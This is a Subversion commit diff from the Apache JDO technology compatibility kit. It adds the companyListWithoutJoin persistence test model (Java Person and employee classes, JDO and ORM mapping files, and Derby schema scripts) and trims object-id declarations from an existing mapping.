getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(super.getFieldRepr()); + rc.append(", $" + wage); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified + * PartTimeEmployee. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IPartTimeEmployee otherEmp = (IPartTimeEmployee)other; + String where = "PartTimeEmployee<" + getPersonid() + ">"; + return super.deepCompareFields(otherEmp, helper) & + helper.closeEnough(wage, otherEmp.getWage(), where + ".wage"); + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Person.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Person.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Person.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Person.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,327 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.io.Serializable; + +import java.text.SimpleDateFormat; + +import java.util.Collections; +import java.util.Comparator; +import java.util.Date; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a person. + */ +public class Person + implements IPerson, Serializable, Comparable, Comparator, DeepEquality { + + private long personid; + private String firstname; + private String lastname; + private String middlename; + private Date birthdate; + + protected static SimpleDateFormat formatter = + new SimpleDateFormat("d/MMM/yyyy"); + + /** This is the JDO-required no-args constructor. */ + protected Person() {} + + /** + * Construct a <code>Person</code> instance. + * @param personid The person identifier. + * @param firstname The person's first name. + * @param lastname The person's last name. + * @param middlename The person's middle name. + * @param birthdate The person's birthdate. + */ + public Person(long personid, String firstname, String lastname, + String middlename, Date birthdate) { + this.personid = personid; + this.firstname = firstname; + this.lastname = lastname; + this.middlename = middlename; + this.birthdate = birthdate; + } + + /** + * Set the id associated with this object. + * @param id the id. + */ + public void setPersonid(long id) { + if (this.personid != 0) + throw new IllegalStateException("Id is already set."); + this.personid = id; + } + + /** + * Get the person's id. + * @return The personid. + */ + public long getPersonid() { + return personid; + } + + /** + * Set the person's id. + * @param personid The personid. + */ + public void setLastname(long personid) { + this.personid = personid; + } + + /** + * Get the person's last name. + * @return The last name. + */ + public String getLastname() { + return lastname; + } + + /** + * Set the person's last name. + * @param lastname The last name. + */ + public void setLastname(String lastname) { + this.lastname = lastname; + } + + /** + * Get the person's first name. + * @return The first name. + */ + public String getFirstname() { + return firstname; + } + + /** + * Set the person's first name. + * @param firstname The first name. + */ + public void setFirstname(String firstname) { + this.firstname = firstname; + } + + /** + * Get the person's middle name. + * @return The middle name. + */ + public String getMiddlename() { + return middlename; + } + + /** + * Set the person's middle name. + * @param middlename The middle name. + */ + public void setMiddlename(String middlename) { + this.middlename = middlename; + } + + /** + * Get the person's birthdate. + * @return The person's birthdate. + */ + public Date getBirthdate() { + return birthdate; + } + + /** + * Set the person's birthdate. + * @param birthdate The person's birthdate. + */ + public void setBirthdate(Date birthdate) { + this. birthdate = birthdate; + } + + /** + * Returns a String representation of a <code>Person</code> object. + * @return a string representation of a <code>Person</code> object. + */ + public String toString() { + return "Person(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(personid); + rc.append(", ").append(lastname); + rc.append(", ").append(firstname); + rc.append(", born ").append(formatter.format(birthdate)); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified Person. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IPerson otherPerson = (IPerson)other; + String where = "Person<" + personid + ">"; + return + helper.equals(personid, otherPerson.getPersonid(), where + ".personid") & + helper.equals(firstname, otherPerson.getFirstname(), where + ".firstname") & + helper.equals(lastname, otherPerson.getLastname(), where + ".lastname") & + helper.equals(middlename, otherPerson.getMiddlename(), where + ".middlename") & + helper.equals(birthdate, otherPerson.getBirthdate(), where + ".birthdate") ; + } + + /** + * Compares this object with the specified object for order. Returns a + * negative integer, zero, or a positive integer as this object is less + * than, equal to, or greater than the specified object. + * @param o The Object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified object. + * @throws ClassCastException - if the specified object's type prevents + * it from being compared to this Object. + */ + public int compareTo(Object o) { + return compareTo((IPerson)o); + } + + /** + * Compare two instances. This is a method in Comparator. + */ + public int compare(Object o1, Object o2) { + return compare((IPerson)o1, (IPerson)o2); + } + + /** + * Compares this object with the specified Person object for + * order. Returns a negative integer, zero, or a positive integer as + * this object is less than, equal to, or greater than the specified + * object. + * @param other The Person object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified Person + * object. + */ + public int compareTo(IPerson other) { + return compare(this, other); + } + + /** + * Compares its two IPerson arguments for order. Returns a negative + * integer, zero, or a positive integer as the first argument is less + * than, equal to, or greater than the second. + * @param o1 the first IPerson object to be compared. + * @param o2 the second IPerson object to be compared. + * @return a negative integer, zero, or a positive integer as the first + * object is less than, equal to, or greater than the second object. + */ + public static int compare(IPerson o1, IPerson o2) { + return EqualityHelper.compare(o1.getPersonid(), o2.getPersonid()); + } + + /** + * Indicates whether some other object is "equal to" this one. + * @param obj the object with which to compare. + * @return <code>true</code> if this object is the same as the obj + * argument; <code>false</code> otherwise. + */ + public boolean equals(Object obj) { + if (obj instanceof IPerson) { + return compareTo((IPerson)obj) == 0; + } + return false; + } + + /** + * Returns a hash code value for the object. + * @return a hash code value for this object. + */ + public int hashCode() { + return (int)personid; + } + /** + * This class is used to represent the application identifier + * for the <code>Person</code> class. + */ + public static class Oid implements Serializable, Comparable { + + /** + * This field represents the identifier for the <code>Person</code> + * class. It must match a field in the <code>Person</code> class in + * both name and type. + */ + public long personid; + + /** + * The required public no-arg constructor. + */ + public Oid() { } + + /** + * Initialize the identifier. + * @param personid The person identifier. + */ + public Oid(long personid) { + this.personid = personid; + } + + public Oid(String s) { personid = Long.parseLong(justTheId(s)); } + + public String toString() { return this.getClass().getName() + ": " + personid;} + + /** */ + public boolean equals(java.lang.Object obj) { + if( obj==null || + !this.getClass().equals(obj.getClass()) ) return( false ); + Oid o = (Oid) obj; + if( this.personid != o.personid ) return( false ); + return( true ); + } + + /** */ + public int hashCode() { + return( (int) personid ); + } + + protected static String justTheId(String str) { + return str.substring(str.indexOf(':') + 1); + } + + /** */ + public int compareTo(Object obj) { + // may throw ClassCastException which the user must handle + Oid other = (Oid) obj; + if( personid < other.personid ) return -1; + if( personid > other.personid ) return 1; + return 0; + } + + } + +} Added: db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo (added) +++ db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo Tue Sep 19 15:29:56 2006 @@ -0,0 +1,95 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<jdo xmlns="http://java.sun.com/xml/ns/jdo/jdo" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/jdo + http://java.sun.com/xml/ns/jdo/jdo_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has application identity. +--> + <package name="org.apache.jdo.tck.pc.companyListWithoutJoin"> + + <class name="Company" + identity-type="application" + objectid-class="org.apache.jdo.tck.pc.companyListWithoutJoin.Company$Oid"> + <field name="companyid" primary-key="true"/> + <field name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Department"/> + </field> + </class> + + <class name="Department" + identity-type="application" + objectid-class="org.apache.jdo.tck.pc.companyListWithoutJoin.Department$Oid"> + <field name="deptid" primary-key="true"/> + <field name="employees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </field> + </class> + + <class name="Employee" + identity-type="application" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyListWithoutJoin.Person"> + <field name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </field> + <field name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </field> + </class> + + <class name="FullTimeEmployee" + identity-type="application" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + + <class name="PartTimeEmployee" + identity-type="application" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + + <class name="Person" + identity-type="application" + objectid-class="org.apache.jdo.tck.pc.companyListWithoutJoin.Person$Oid"> + <field name="personid" primary-key="true"/> + <field name="middlename" default-fetch-group="false"/> + </class> + + <interface name="ICompany" + identity-type="application"> + <property name="companyid" primary-key="true"/> + <property name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.IDepartment"/> + </property> + </interface> + + <interface name="IDepartment" + identity-type="application"> + <property name="deptid" primary-key="true"/> + <property name="employees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </property> + </interface> + + <interface name="IEmployee" + identity-type="application"> + <property name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.IEmployee"/> + </property> + <property name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.IEmployee"/> + </property> + </interface> + + <interface name="IFullTimeEmployee" + identity-type="application"/> + + <interface name="IPartTimeEmployee" + identity-type="application"/> + + <interface name="IPerson" + identity-type="application"> + <property name="personid" primary-key="true"/> + <property name="middlename" default-fetch-group="false"/> + </interface> + + </package> +</jdo> Added: db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo (added) +++ db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package.jdo Tue Sep 19 15:29:56 2006 @@ -0,0 +1,92 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<jdo xmlns="http://java.sun.com/xml/ns/jdo/jdo" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/jdo + http://java.sun.com/xml/ns/jdo/jdo_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has datastore identity. +--> + <package name="org.apache.jdo.tck.pc.companyListWithoutJoin"> + + <class name="Company" + identity-type="datastore"> + <field name="companyid"/> + <field name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Department"/> + </field> + </class> + + <class name="Department" + identity-type="datastore"> + <field name="deptid"/> + <field name="employees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </field> + </class> + + <class name="Employee" + identity-type="datastore" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyListWithoutJoin.Person"> + <field name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </field> + <field name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </field> + </class> + + <class name="FullTimeEmployee" + identity-type="datastore" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + + <class name="PartTimeEmployee" + identity-type="datastore" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + + <class name="Person" + identity-type="datastore"> + <field name="personid"/> + <field name="middlename" default-fetch-group="false"/> + </class> + + <interface name="ICompany" + identity-type="datastore"> + <property name="companyid"/> + <property name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.IDepartment"/> + </property> + </interface> + + <interface name="IDepartment" + identity-type="datastore"> + <property name="deptid"/> + <property name="employees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.Employee"/> + </property> + </interface> + + <interface name="IEmployee" + identity-type="datastore"> + <property name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.IEmployee"/> + </property> + <property name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyListWithoutJoin.IEmployee"/> + </property> + </interface> + + <interface name="IFullTimeEmployee" + identity-type="datastore"/> + + <interface name="IPartTimeEmployee" + identity-type="datastore"/> + + <interface name="IPerson" + identity-type="datastore"> + <property name="personid"/> + <property name="middlename" default-fetch-group="false"/> + </interface> + + </package> +</jdo> Modified: db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo?view=diff&rev=447999&r1=447998&r2=447999 ============================================================================== --- db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo (original) +++ db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo Tue Sep 19 15:29:56 2006 @@ -10,16 +10,14 @@ <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> <class name="Company" - identity-type="datastore" - objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Company$Oid"> + identity-type="datastore"> <field name="departments" persistence-modifier="persistent"> <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Department"/> </field> </class> <class name="Department" - identity-type="datastore" - objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Department$Oid"> + identity-type="datastore"> <field name="roles" persistence-modifier="persistent"> <map key-type="String" value-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> @@ -46,8 +44,7 @@ persistence-capable-superclass="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> <class name="Person" - identity-type="datastore" - objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Person$Oid"> + identity-type="datastore"> <field name="middlename" default-fetch-group="false"/> </class> Added: db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm (added) +++ db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm Tue Sep 19 15:29:56 2006 @@ -0,0 +1,147 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<orm xmlns="http://java.sun.com/xml/ns/jdo/orm" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/orm + http://java.sun.com/xml/ns/jdo/orm_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has application identity. +--> + <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + + <class name="Company" table="companies"> + <field name="companyid" column="ID"/> + <field name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </field> + <field name="founded" column="FOUNDEDDATE"/> + <field name="departments" mapped-by="company"/> + </class> + + <class name="Department" table="departments"> + <field name="deptid" column="ID"/> + <field name="name" column="NAME"/> + <field name="company" column="COMPANYID"/> + <!-- field type is List<Employee> --> + <field name="employees"> + <order column="hiredate"/> + <element mapped-by="department"/> + </field> + </class> + + <class name="PartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="wage" column="WAGE"/> + </class> + + <class name="FullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="salary" column="SALARY"/> + </class> + + <class name="Employee"> + <inheritance strategy="superclass-table"/> + <field name="hiredate" column="HIREDATE"/> + <field name="weeklyhours" column="WEEKLYHOURS"/> + <field name="department" column="DEPARTMENT"> + <foreign-key/> + </field> + <field name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </field> + <field name="manager" column="MANAGER"> + <foreign-key/> + </field> + <field name="mentor" column="MENTOR"> + <foreign-key/> + </field> + <field name="protege" mapped-by="mentor"/> + <field name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </field> + <field name="team" mapped-by="manager"/> + <field name="hradvisees" mapped-by="hradvisor"/> + </class> + + <class name="Person" table="persons"> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <field name="personid" column="PERSONID"/> + <field name="firstname" column="FIRSTNAME"/> + <field name="lastname" column="LASTNAME"/> + <field name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </field> + <field name="birthdate" column="BIRTHDATE"/> + </class> + + <interface name="ICompany" table="companies"> + <property name="companyid" column="ID"/> + <property name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </property> + <property name="founded" column="FOUNDEDDATE"/> + <property name="departments" mapped-by="company"/> + </interface> + + <interface name="IDepartment" table="departments"> + <!-- field type is List<Employee> --> + <field name="employees"> + <order column="hiredate"/> + <element mapped-by="department"/> + </field> + <property name="deptid" column="ID"/> + <property name="name" column="NAME"/> + <property name="company" column="COMPANYID"/> + </interface> + + <interface name="IPartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="wage" column="WAGE"/> + </interface> + + <interface name="IFullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="salary" column="SALARY"/> + </interface> + + <interface name="IEmployee"> + <inheritance strategy="superclass-table"/> + <property name="hiredate" column="HIREDATE"/> + <property name="weeklyhours" column="WEEKLYHOURS"/> + <property name="department" column="DEPARTMENT"> + <foreign-key/> + </property> + <property name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </property> + <property name="manager" column="MANAGER"> + <foreign-key/> + </property> + <property name="mentor" column="MENTOR"> + <foreign-key/> + </property> + <property name="protege" mapped-by="mentor"/> + <property name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </property> + <property name="team" mapped-by="manager"/> + <property name="hradvisees" mapped-by="hradvisor"/> + </interface> + + <interface name="IPerson" table="persons"> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <property name="personid" column="PERSONID"/> + <property name="firstname" column="FIRSTNAME"/> + <property name="lastname" column="LASTNAME"/> + <property name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </property> + </interface> + </package> +</orm> Added: db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm (added) +++ db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm Tue Sep 19 15:29:56 2006 @@ -0,0 +1,150 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<orm xmlns="http://java.sun.com/xml/ns/jdo/orm" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/orm + http://java.sun.com/xml/ns/jdo/orm_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has datastore identity. +--> + <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + + <class name="Company" table="companies"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <field name="companyid" column="ID"/> + <field name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </field> + <field name="founded" column="FOUNDEDDATE"/> + <field name="departments" mapped-by="company"/> + </class> + + <class name="Department" table="departments"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <field name="deptid" column="ID"/> + <field name="name" column="NAME"/> + <field name="company" column="COMPANYID"/> + <!-- field type is List<Employee> --> + <field name="employees"> + <order column="hiredate"/> + <element mapped-by="department"/> + </field> + </class> + + <class name="PartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="wage" column="WAGE"/> + </class> + + <class name="FullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="salary" column="SALARY"/> + </class> + + <class name="Employee"> + <inheritance strategy="superclass-table"/> + <field name="hiredate" column="HIREDATE"/> + <field name="weeklyhours" column="WEEKLYHOURS"/> + <field name="department" column="DEPARTMENT"> + <foreign-key/> + </field> + <field name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </field> + <field name="manager" column="MANAGER"> + <foreign-key/> + </field> + <field name="mentor" column="MENTOR"> + <foreign-key/> + </field> + <field name="protege" mapped-by="mentor"/> + <field name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </field> + <field name="team" mapped-by="manager"/> + <field name="hradvisees" mapped-by="hradvisor"/> + </class> + + <class name="Person" table="persons"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <field name="personid" column="PERSONID"/> + <field name="firstname" column="FIRSTNAME"/> + <field name="lastname" column="LASTNAME"/> + <field name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </field> + <field name="birthdate" column="BIRTHDATE"/> + </class> + + <interface name="ICompany" table="companies"> + <property name="companyid" column="ID"/> + <property name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </property> + <property name="founded" column="FOUNDEDDATE"/> + <property name="departments" mapped-by="company"/> + </interface> + + <interface name="IDepartment" table="departments"> + <!-- field type is List<Employee> --> + <field name="employees"> + <order column="hiredate"/> + <element mapped-by="department"/> + </field> + <property name="deptid" column="ID"/> + <property name="name" column="NAME"/> + <property name="company" column="COMPANYID"/> + </interface> + + <interface name="IPartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="wage" column="WAGE"/> + </interface> + + <interface name="IFullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="salary" column="SALARY"/> + </interface> + + <interface name="IEmployee"> + <inheritance strategy="superclass-table"/> + <property name="hiredate" column="HIREDATE"/> + <property name="weeklyhours" column="WEEKLYHOURS"/> + <property name="department" column="DEPARTMENT"> + <foreign-key/> + </property> + <property name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </property> + <property name="manager" column="MANAGER"> + <foreign-key/> + </property> + <property name="mentor" column="MENTOR"> + <foreign-key/> + </property> + <property name="protege" mapped-by="mentor"/> + <property name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </property> + <property name="team" mapped-by="manager"/> + <property name="hradvisees" mapped-by="hradvisor"/> + </interface> + + <interface name="IPerson" table="persons"> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <property name="personid" column="PERSONID"/> + <property name="firstname" column="FIRSTNAME"/> + <property name="lastname" column="LASTNAME"/> + <property name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </property> + </interface> + </package> +</orm> Added: db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema10.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema10.sql?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema10.sql (added) +++ db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema10.sql Tue Sep 19 15:29:56 2006 @@ -0,0 +1,68 @@ +-- SchemaType: application identity + +connect 'jdbc:derby:jdotckdb;create=true' user 'tckuser' password 'tckuser'; + +CREATE SCHEMA applicationidentity10; +SET SCHEMA applicationidentity10; + +------------------------- +-- company +------------------------- + +ALTER TABLE departments DROP CONSTRAINT EMP_MO_FK; +ALTER TABLE departments DROP CONSTRAINT DEPTS_COMP_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_DEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_FUNDDEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MANAGER_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MENTOR_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_HRADVISOR_FK; +DROP TABLE persons; +DROP TABLE departments; +DROP TABLE companies; + +CREATE TABLE companies ( + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + FOUNDEDDATE VARCHAR(32) NOT NULL, + CONSTRAINT COMPS_PK PRIMARY KEY (ID) +); + +CREATE TABLE departments ( + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + EMP_OF_THE_MONTH INTEGER, + COMPANYID INTEGER, + DISCRIMINATOR VARCHAR(255), + CONSTRAINT DEPTS_COMP_FK FOREIGN KEY (COMPANYID) REFERENCES companies, + CONSTRAINT DEPTS_PK PRIMARY KEY (ID) +); + +CREATE TABLE persons ( + PERSONID INTEGER NOT NULL, + FIRSTNAME VARCHAR(32) NOT NULL, + LASTNAME VARCHAR(32) NOT NULL, + MIDDLENAME VARCHAR(32), + BIRTHDATE VARCHAR(32) NOT NULL, + DISCRIMINATOR varchar(64) NOT NULL, + HIREDATE VARCHAR(32), + WEEKLYHOURS REAL, + DEPARTMENT INTEGER, + FUNDINGDEPT INTEGER, + MANAGER INTEGER, + MENTOR INTEGER, + HRADVISOR INTEGER, + SALARY REAL, + WAGE REAL, + CONSTRAINT PERS_DEPT_FK FOREIGN KEY (DEPARTMENT) REFERENCES departments, + CONSTRAINT PERS_FUNDDEPT_FK FOREIGN KEY (FUNDINGDEPT) + REFERENCES departments, + CONSTRAINT PERS_MANAGER_FK FOREIGN KEY (MANAGER) REFERENCES persons, + CONSTRAINT PERS_MENTOR_FK FOREIGN KEY (MENTOR) REFERENCES persons, + CONSTRAINT PERS_HRADVISOR_FK FOREIGN KEY (HRADVISOR) REFERENCES persons, + CONSTRAINT PERS_PK PRIMARY KEY (PERSONID) +); + +ALTER TABLE departments + ADD CONSTRAINT EMP_MO_FK FOREIGN KEY + (EMP_OF_THE_MONTH) REFERENCES persons(PERSONID); + Added: db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema10.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema10.sql?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema10.sql (added) +++ db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema10.sql Tue Sep 19 15:29:56 2006 @@ -0,0 +1,71 @@ +-- SchemaType: datastore identity + +connect 'jdbc:derby:jdotckdb;create=true' user 'tckuser' password 'tckuser'; + +CREATE SCHEMA datastoreidentity10; +SET SCHEMA datastoreidentity10; + +------------------------- +-- company +------------------------- + +ALTER TABLE departments DROP CONSTRAINT EMP_MO_FK; +ALTER TABLE departments DROP CONSTRAINT DEPTS_COMP_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_DEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_FUNDDEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MANAGER_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MENTOR_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_HRADVISOR_FK; +DROP TABLE persons; +DROP TABLE departments; +DROP TABLE companies; + +CREATE TABLE companies ( + DATASTORE_IDENTITY INTEGER NOT NULL GENERATED ALWAYS AS IDENTITY, + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + FOUNDEDDATE VARCHAR(32) NOT NULL, + CONSTRAINT COMPS_PK PRIMARY KEY (DATASTORE_IDENTITY) +); 